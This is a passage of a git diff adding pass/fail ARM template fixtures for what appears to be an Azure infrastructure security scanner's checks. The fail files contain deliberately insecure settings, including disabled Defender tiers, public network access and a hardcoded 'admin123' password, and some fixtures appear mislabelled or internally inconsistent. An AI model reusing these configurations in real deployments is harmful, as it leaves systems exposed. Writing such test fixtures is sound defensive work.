+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.Kusto/clusters",
+      "location": "West Europe",
+      "name": "pass",
+      "sku": {
+        "name": "B_Gen5_2",
+        "size": "5120"
+      },
+      "properties": {
+        "version": "10.3",
+        "administratorLogin": "admin",
+        "administratorLoginPassword": "admin123",
+        "enableDoubleEncryption": true,
+        "storageProfile": {
+          "storageMB": "5120"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/fail.json
new file mode 100644
index 00000000000..2067162de1c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/fail.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Security/pricings",
+      "apiVersion": "2024-01-01",
+      "name": "KeyVaults",
+      "properties": {
+        "pricingTier": "Free",
+        "extensions": [
+          {
+            "name": "KeyVaults"
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/pass.json
new file mode 100644
index 00000000000..e78c0ab0802
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKeyVaults/pass.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Security/pricings",
+      "apiVersion": "2024-01-01",
+      "name": "KeyVaults",
+      "properties": {
+        "pricingTier": "Standard",
+        "extensions": [
+          {
+            "name": "KeyVaults"
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/fail.json
new file mode 100644
index 00000000000..9c5f5f63c43
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/fail.json
@@ -0,0 +1,51 @@
+{
+"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+"contentVersion": "1.0.0.0",
+"parameters": {
+    "pricing": {
+        "type": "string",
+        "allowedValues": [
+            "Standard",
+            "Free"
+        ]
+    }
+},
+
+"resources": [
+    {
+        "type": "Microsoft.Security/pricings",
+        "apiVersion": "2017-08-01-preview",
+        "name": "KubernetesService",
+        "properties": {
+            "pricingTier": "Free"
+        }
+    },
+            {
+            "type": "Microsoft.Compute/disks",
+            "apiVersion": "2023-01-02",
+            "name": "[parameters('disks_acctestmd1_name')]",
+            "location": "westus2",
+            "tags": {
+                "environment": "staging"
+            },
+            "sku": {
+                "name": "Standard_LRS",
+                "tier": "Standard"
+            },
+            "properties": {
+                "creationData": {
+                    "createOption": "Empty"
+                },
+                "diskSizeGB": 1,
+                "diskIOPSReadWrite": 500,
+                "diskMBpsReadWrite": 60,
+                "encryption": {
+                    "type": "EncryptionAtRestWithPlatformKey"
+                },
+                "networkAccessPolicy": "AllowAll",
+                "publicNetworkAccess": "Enabled",
+                "diskState": "Unattached"
+            }
+        }
+
+]}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/pass.json
new file mode 100644
index 00000000000..ce58fcf63a0
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnKubernetes/pass.json
@@ -0,0 +1,49 @@
+{
+"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+"contentVersion": "1.0.0.0",
+"parameters": {
+    "pricing": {
+        "type": "string",
+        "allowedValues": [
+            "Standard",
+            "Free"
+        ]
+    }
+},
+"resources": [
+
+    {
+        "type": "Microsoft.Security/pricings",
+        "apiVersion": "2018-06-01",
+        "name": "KubernetesService",
+        "dependsOn": [
+            "[concat('Microsoft.Security/pricings/default')]"
+        ],
+        "properties": {
+            "pricingTier": "Standard"
+        }
+    },
+    {
+        "type": "Microsoft.Security/pricings",
+        "apiVersion": "2018-06-01",
+        "name": "KeyVaults",
+        "dependsOn": [
+            "[concat('Microsoft.Security/pricings/SqlServers')]"
+        ],
+        "properties": {
+            "pricingTier": "Standard"
+        }
+    },
+    {
+        "type": "Microsoft.Security/pricings",
+        "apiVersion": "2018-06-01",
+        "name": "SqlServerVirtualMachines",
+        "dependsOn": [
+            "[concat('Microsoft.Security/pricings/AppServices')]"
+        ],
+        "properties": {
+            "pricingTier": "Standard"
+        }
+    }
+]
+}
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/fail.json
new file mode 100644
index 00000000000..68beade1e4e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/fail.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+        "type": "Microsoft.Security/pricings",
+        "apiVersion": "2020-01-01",
+        "name": "SqlServerVirtualMachines",
+        "properties": {
+        "tier": "Standard"
+      }
+    }
+  ],
+  "outputs": {
+    "defenderResourceId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.Security/autoProvisioningSettings', parameters('defenderName'))]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/pass.json
new file mode 100644
index 00000000000..a4c00996450
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnSqlServersVMS/pass.json
@@ -0,0 +1,20 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+        "type": "Microsoft.Security/pricings",
+        "apiVersion": "2020-01-01",
+        "name": "SqlServerVirtualMachines",
+        "properties": {
+        "tier": "Free"
+      }
+    }
+  ],
+  "outputs": {
+    "defenderResourceId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.Security/autoProvisioningSettings', parameters('defenderName'))]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json
new file mode 100644
index 00000000000..d75a866210a
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Security/pricings",
+      "apiVersion": "2018-06-01",
+      "name": "fail",
+      "properties": {
+        "pricingTier": "Free",
+        "resourceType": "Microsoft.Security/pricings"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json
new file mode 100644
index 00000000000..e7cf4f13566
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Security/pricings",
+      "apiVersion": "2018-06-01",
+      "name": "pass",
+      "properties": {
+        "pricingTier": "Standard",
+        "resourceType": "Microsoft.Security/pricings"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json
new file mode 100644
index 00000000000..b8c2eaf5e5c
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+      {
+        "type": "Microsoft.MachineLearningServices/workspaces",
+        "apiVersion": "2022-12-01",
+        "name": "fail1",
+        "location": "West US",
+        "properties": {
+          "managedNetwork": {
+            "outboundRules": {
+                "rule1": {
+                    "type": "ServiceTag"
+                }
+            }
+          }
+        }
+      }
+    ]
+  }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json
new file mode 100644
index 00000000000..ce16d6b2fdd
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json
@@ -0,0 +1,16 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.MachineLearningServices/workspaces",
+      "apiVersion": "2022-12-01",
+      "name": "fail2",
+      "location": "West US",
+      "properties": {
+          "description": "No networks"
+
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json
new file mode 100644
index 00000000000..c994b877deb
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+      {
+        "type": "Microsoft.MachineLearningServices/workspaces",
+        "apiVersion": "2022-12-01",
+        "name": "pass1",
+        "location": "West US",
+        "properties": {
+          "managedNetwork": {
+            "outboundRules": {
+                "rule1": {
+                    "type": "PrivateEndpoint"
+                }
+            }
+          }
+        }
+      }
+    ]
+  }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json
new file mode 100644
index 00000000000..babc0287faf
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json
@@ -0,0 +1,24 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+      {
+        "type": "Microsoft.MachineLearningServices/workspaces",
+        "apiVersion": "2022-12-01",
+        "name": "pass2",
+        "location": "West US",
+        "properties": {
+          "managedNetwork": {
+            "outboundRules": {
+                "rule1": {
+                    "type": "ServiceTag"
+                },
+                "rule2": {
+                  "type": "PrivateEndpoint"
+              }
+            }
+          }
+        }
+      }
+    ]
+  }
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail.json b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail.json
new file mode 100644
index 00000000000..3f8e6849fd4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail.json
@@ -0,0 +1,17 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Search/searchServices",
+      "apiVersion": "2020-08-01-Preview",
+      "name": "fail",
+      "sku": {
+        "name": "standard"
+      },
+      "properties": {
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail2.json b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail2.json
new file mode 100644
index 00000000000..791f340331b
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSearchSLAIndex/fail2.json
@@ -0,0 +1,17 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Search/searchServices",
+      "apiVersion": "2020-08-01",
+      "name": "fail2",
+      "sku": {
+        "name": "standard"
+      },
+      "properties": {
+        "replicaCount": 2
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureSearchSLAIndex/pass.json b/tests/arm/checks/resource/example_AzureSearchSLAIndex/pass.json
new file mode 100644
index 00000000000..97efe485f93
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSearchSLAIndex/pass.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Search/searchServices",
+      "apiVersion": "2024-03-01-preview",
+      "name": "pass",
+      "location": "string",
+      "sku": {
+        "name": "standard"
+      },
+      "properties": {
+        "publicNetworkAccess": "Disabled",
+        "replicaCount": 3
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail.json b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail.json
new file mode 100644
index 00000000000..9e52cf063b8
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Search/searchServices",
+      "apiVersion": "2024-03-01-preview",
+      "name": "fail",
+      "location": "string",
+      "sku": {
+        "name": "standard"
+      },
+      "properties": {
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail2.json b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail2.json
new file mode 100644
index 00000000000..528a8fd2e36
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/fail2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Search/searchServices",
+      "apiVersion": "2024-03-01-preview",
+      "name": "fail2",
+      "location": "string",
+      "sku": {
+        "name": "standard"
+      },
+      "properties": {
+        "replicaCount": 1
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/pass.json b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/pass.json
new file mode 100644
index 00000000000..378feee1584
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSearchSLAQueryUpdates/pass.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Search/searchServices",
+      "apiVersion": "2024-03-01-preview",
+      "name": "pass",
+      "location": "string",
+      "sku": {
+        "name": "standard"
+      },
+      "properties": {
+        "publicNetworkAccess": "Disabled",
+        "replicaCount": 2
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail.json b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail.json
new file mode 100644
index 00000000000..51b1f2776ac
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail.json
@@ -0,0 +1,145 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+       {
+  "type": "Microsoft.ServiceFabric/clusters",
+  "apiVersion": "2019-03-01",
+  "name": "fail",
+  "location": "string",
+  "tags": {
+    "tagName1": "tagValue1",
+    "tagName2": "tagValue2"
+  },
+  "properties": {
+    "addOnFeatures": [ "string" ],
+    "azureActiveDirectory": {
+      "clientApplication": "string",
+      "clusterApplication": "string",
+      "tenantId": "string"
+    },
+    "certificate": {
+      "thumbprint": "string",
+      "thumbprintSecondary": "string",
+      "x509StoreName": "string"
+    },
+    "certificateCommonNames": {
+      "commonNames": [
+        {
+          "certificateCommonName": "string",
+          "certificateIssuerThumbprint": "string"
+        }
+      ],
+      "x509StoreName": "string"
+    },
+    "clientCertificateCommonNames": [
+      {
+        "certificateCommonName": "string",
+        "certificateIssuerThumbprint": "string",
+        "isAdmin": "bool"
+      }
+    ],
+    "clientCertificateThumbprints": [
+      {
+        "certificateThumbprint": "string",
+        "isAdmin": "bool"
+      }
+    ],
+    "clusterCodeVersion": "string",
+    "diagnosticsStorageAccountConfig": {
+      "blobEndpoint": "string",
+      "protectedAccountKeyName": "string",
+      "queueEndpoint": "string",
+      "storageAccountName": "string",
+      "tableEndpoint": "string"
+    },
+    "eventStoreServiceEnabled": "bool",
+    "managementEndpoint": "string",
+    "nodeTypes": [
+      {
+        "applicationPorts": {
+          "endPort": "int",
+          "startPort": "int"
+        },
+        "capacities": {
+          "{customized property}": "string"
+        },
+        "clientConnectionEndpointPort": "int",
+        "durabilityLevel": "string",
+        "ephemeralPorts": {
+          "endPort": "int",
+          "startPort": "int"
+        },
+        "httpGatewayEndpointPort": "int",
+        "isPrimary": "bool",
+        "name": "string",
+        "placementProperties": {
+          "{customized property}": "string"
+        },
+        "reverseProxyEndpointPort": "int",
+        "vmInstanceCount": "int"
+      }
+    ],
+    "reliabilityLevel": "string",
+    "reverseProxyCertificate": {
+      "thumbprint": "string",
+      "thumbprintSecondary": "string",
+      "x509StoreName": "string"
+    },
+    "reverseProxyCertificateCommonNames": {
+      "commonNames": [
+        {
+          "certificateCommonName": "string",
+          "certificateIssuerThumbprint": "string"
+        }
+      ],
+      "x509StoreName": "string"
+    },
+    "upgradeDescription": {
+      "deltaHealthPolicy": {
+        "applicationDeltaHealthPolicies": {
+          "{customized property}": {
+            "defaultServiceTypeDeltaHealthPolicy": {
+              "maxPercentDeltaUnhealthyServices": "int"
+            },
+            "serviceTypeDeltaHealthPolicies": {
+              "{customized property}": {
+                "maxPercentDeltaUnhealthyServices": "int"
+              }
+            }
+          }
+        },
+        "maxPercentDeltaUnhealthyApplications": "int",
+        "maxPercentDeltaUnhealthyNodes": "int",
+        "maxPercentUpgradeDomainDeltaUnhealthyNodes": "int"
+      },
+      "forceRestart": "bool",
+      "healthCheckRetryTimeout": "string",
+      "healthCheckStableDuration": "string",
+      "healthCheckWaitDuration": "string",
+      "healthPolicy": {
+        "applicationHealthPolicies": {
+          "{customized property}": {
+            "defaultServiceTypeHealthPolicy": {
+              "maxPercentUnhealthyServices": "int"
+            },
+            "serviceTypeHealthPolicies": {
+              "{customized property}": {
+                "maxPercentUnhealthyServices": "int"
+              }
+            }
+          }
+        },
+        "maxPercentUnhealthyApplications": "int",
+        "maxPercentUnhealthyNodes": "int"
+      },
+      "upgradeDomainTimeout": "string",
+      "upgradeReplicaSetCheckTimeout": "string",
+      "upgradeTimeout": "string"
+    },
+    "upgradeMode": "string",
+    "vmImage": "string"
+  }
+}
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail2.json b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail2.json
new file mode 100644
index 00000000000..5fb9508623f
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/fail2.json
@@ -0,0 +1,156 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+       {
+  "type": "Microsoft.ServiceFabric/clusters",
+  "apiVersion": "2019-03-01",
+  "name": "fail2",
+  "location": "string",
+  "tags": {
+    "tagName1": "tagValue1",
+    "tagName2": "tagValue2"
+  },
+  "properties": {
+    "addOnFeatures": [ "string" ],
+    "azureActiveDirectory": {
+      "clientApplication": "string",
+      "clusterApplication": "string",
+      "tenantId": "string"
+    },
+    "certificate": {
+      "thumbprint": "string",
+      "thumbprintSecondary": "string",
+      "x509StoreName": "string"
+    },
+    "certificateCommonNames": {
+      "commonNames": [
+        {
+          "certificateCommonName": "string",
+          "certificateIssuerThumbprint": "string"
+        }
+      ],
+      "x509StoreName": "string"
+    },
+    "clientCertificateCommonNames": [
+      {
+        "certificateCommonName": "string",
+        "certificateIssuerThumbprint": "string",
+        "isAdmin": "bool"
+      }
+    ],
+    "clientCertificateThumbprints": [
+      {
+        "certificateThumbprint": "string",
+        "isAdmin": "bool"
+      }
+    ],
+    "clusterCodeVersion": "string",
+    "diagnosticsStorageAccountConfig": {
+      "blobEndpoint": "string",
+      "protectedAccountKeyName": "string",
+      "queueEndpoint": "string",
+      "storageAccountName": "string",
+      "tableEndpoint": "string"
+    },
+    "eventStoreServiceEnabled": "bool",
+    "fabricSettings": [
+      {
+       "name": "Security",
+        "parameters": [
+          {
+            "name": "ClusterProtectionLevel",
+            "value": "sign"
+          }
+        ]
+      }
+    ],
+    "managementEndpoint": "string",
+    "nodeTypes": [
+      {
+        "applicationPorts": {
+          "endPort": "int",
+          "startPort": "int"
+        },
+        "capacities": {
+          "{customized property}": "string"
+        },
+        "clientConnectionEndpointPort": "int",
+        "durabilityLevel": "string",
+        "ephemeralPorts": {
+          "endPort": "int",
+          "startPort": "int"
+        },
+        "httpGatewayEndpointPort": "int",
+        "isPrimary": "bool",
+        "name": "string",
+        "placementProperties": {
+          "{customized property}": "string"
+        },
+        "reverseProxyEndpointPort": "int",
+        "vmInstanceCount": "int"
+      }
+    ],
+    "reliabilityLevel": "string",
+    "reverseProxyCertificate": {
+      "thumbprint": "string",
+      "thumbprintSecondary": "string",
+      "x509StoreName": "string"
+    },
+    "reverseProxyCertificateCommonNames": {
+      "commonNames": [
+        {
+          "certificateCommonName": "string",
+          "certificateIssuerThumbprint": "string"
+        }
+      ],
+      "x509StoreName": "string"
+    },
+    "upgradeDescription": {
+      "deltaHealthPolicy": {
+        "applicationDeltaHealthPolicies": {
+          "{customized property}": {
+            "defaultServiceTypeDeltaHealthPolicy": {
+              "maxPercentDeltaUnhealthyServices": "int"
+            },
+            "serviceTypeDeltaHealthPolicies": {
+              "{customized property}": {
+                "maxPercentDeltaUnhealthyServices": "int"
+              }
+            }
+          }
+        },
+        "maxPercentDeltaUnhealthyApplications": "int",
+        "maxPercentDeltaUnhealthyNodes": "int",
+        "maxPercentUpgradeDomainDeltaUnhealthyNodes": "int"
+      },
+      "forceRestart": "bool",
+      "healthCheckRetryTimeout": "string",
+      "healthCheckStableDuration": "string",
+      "healthCheckWaitDuration": "string",
+      "healthPolicy": {
+        "applicationHealthPolicies": {
+          "{customized property}": {
+            "defaultServiceTypeHealthPolicy": {
+              "maxPercentUnhealthyServices": "int"
+            },
+            "serviceTypeHealthPolicies": {
+              "{customized property}": {
+                "maxPercentUnhealthyServices": "int"
+              }
+            }
+          }
+        },
+        "maxPercentUnhealthyApplications": "int",
+        "maxPercentUnhealthyNodes": "int"
+      },
+      "upgradeDomainTimeout": "string",
+      "upgradeReplicaSetCheckTimeout": "string",
+      "upgradeTimeout": "string"
+    },
+    "upgradeMode": "string",
+    "vmImage": "string"
+  }
+}
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/pass.json b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/pass.json
new file mode 100644
index 00000000000..6e77f60ac08
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureServiceFabricClusterProtectionLevel/pass.json
@@ -0,0 +1,158 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "resources": [
+       {
+  "type": "Microsoft.ServiceFabric/clusters",
+  "apiVersion": "2019-03-01",
+  "name": "pass",
+  "location": "string",
+  "tags": {
+    "tagName1": "tagValue1",
+    "tagName2": "tagValue2"
+  },
+  "properties": {
+    "addOnFeatures": [ "string" ],
+    "azureActiveDirectory": {
+      "clientApplication": "string",
+      "clusterApplication": "string",
+      "tenantId": "string"
+    },
+    "certificate": {
+      "thumbprint": "string",
+      "thumbprintSecondary": "string",
+      "x509StoreName": "string"
+    },
+    "certificateCommonNames": {
+      "commonNames": [
+        {
+          "certificateCommonName": "string",
+          "certificateIssuerThumbprint": "string"
+        }
+      ],
+      "x509StoreName": "string"
+    },
+    "clientCertificateCommonNames": [
+      {
+        "certificateCommonName": "string",
+        "certificateIssuerThumbprint": "string",
+        "isAdmin": "bool"
+      }
+    ],
+    "clientCertificateThumbprints": [
+      {
+        "certificateThumbprint": "string",
+        "isAdmin": "bool"
+      }
+    ],
+    "clusterCodeVersion": "string",
+    "diagnosticsStorageAccountConfig": {
+      "blobEndpoint": "string",
+      "protectedAccountKeyName": "string",
+      "queueEndpoint": "string",
+      "storageAccountName": "string",
+      "tableEndpoint": "string"
+    },
+    "eventStoreServiceEnabled": "bool",
+
+    "fabricSettings": [
+      {
+       "name": "Security",
+        "parameters": [
+          {
+            "name": "ClusterProtectionLevel",
+            "value": "EncryptAndSign"
+
+          }
+        ]
+      }
+    ],
+    "managementEndpoint": "string",
+    "nodeTypes": [
+      {
+        "applicationPorts": {
+          "endPort": "int",
+          "startPort": "int"
+        },
+        "capacities": {
+          "{customized property}": "string"
+        },
+        "clientConnectionEndpointPort": "int",
+        "durabilityLevel": "string",
+        "ephemeralPorts": {
+          "endPort": "int",
+          "startPort": "int"
+        },
+        "httpGatewayEndpointPort": "int",
+        "isPrimary": "bool",
+        "name": "string",
+        "placementProperties": {
+          "{customized property}": "string"
+        },
+        "reverseProxyEndpointPort": "int",
+        "vmInstanceCount": "int"
+      }
+    ],
+    "reliabilityLevel": "string",
+    "reverseProxyCertificate": {
+      "thumbprint": "string",
+      "thumbprintSecondary": "string",
+      "x509StoreName": "string"
+    },
+    "reverseProxyCertificateCommonNames": {
+      "commonNames": [
+        {
+          "certificateCommonName": "string",
+          "certificateIssuerThumbprint": "string"
+        }
+      ],
+      "x509StoreName": "string"
+    },
+    "upgradeDescription": {
+      "deltaHealthPolicy": {
+        "applicationDeltaHealthPolicies": {
+          "{customized property}": {
+            "defaultServiceTypeDeltaHealthPolicy": {
+              "maxPercentDeltaUnhealthyServices": "int"
+            },
+            "serviceTypeDeltaHealthPolicies": {
+              "{customized property}": {
+                "maxPercentDeltaUnhealthyServices": "int"
+              }
+            }
+          }
+        },
+        "maxPercentDeltaUnhealthyApplications": "int",
+        "maxPercentDeltaUnhealthyNodes": "int",
+        "maxPercentUpgradeDomainDeltaUnhealthyNodes": "int"
+      },
+      "forceRestart": "bool",
+      "healthCheckRetryTimeout": "string",
+      "healthCheckStableDuration": "string",
+      "healthCheckWaitDuration": "string",
+      "healthPolicy": {
+        "applicationHealthPolicies": {
+          "{customized property}": {
+            "defaultServiceTypeHealthPolicy": {
+              "maxPercentUnhealthyServices": "int"
+            },
+            "serviceTypeHealthPolicies": {
+              "{customized property}": {
+                "maxPercentUnhealthyServices": "int"
+              }
+            }
+          }
+        },
+        "maxPercentUnhealthyApplications": "int",
+        "maxPercentUnhealthyNodes": "int"
+      },
+      "upgradeDomainTimeout": "string",
+      "upgradeReplicaSetCheckTimeout": "string",
+      "upgradeTimeout": "string"
+    },
+    "upgradeMode": "string",
+    "vmImage": "string"
+  }
+}
+    ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail1.json b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail1.json
new file mode 100644
index 00000000000..fad70cb1247
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail1.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces/bigDataPools",
+      "apiVersion": "2021-02-01",
+      "name": "fail1",
+      "location": "East US",
+      "properties": {
+        "isComputeIsolationEnabled": false,
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail2.json b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail2.json
new file mode 100644
index 00000000000..c196f5b0ba3
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/fail2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Synapse/workspaces/bigDataPools",
+      "apiVersion": "2021-02-01",
+      "name": "fail2",
+      "location": "East US",
+      "properties": {
+        "storageAccountAccessKey": "string",
+        "storageContainerPath": "string",
+        "storageContainerSasKey": "string"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/pass.json b/tests/arm/checks/resource/example_AzureSparkPoolIsolatedComputeEnabled/pass.json
new file mode 100644
index 00000000000..38ab33f7f20
--- /dev/null
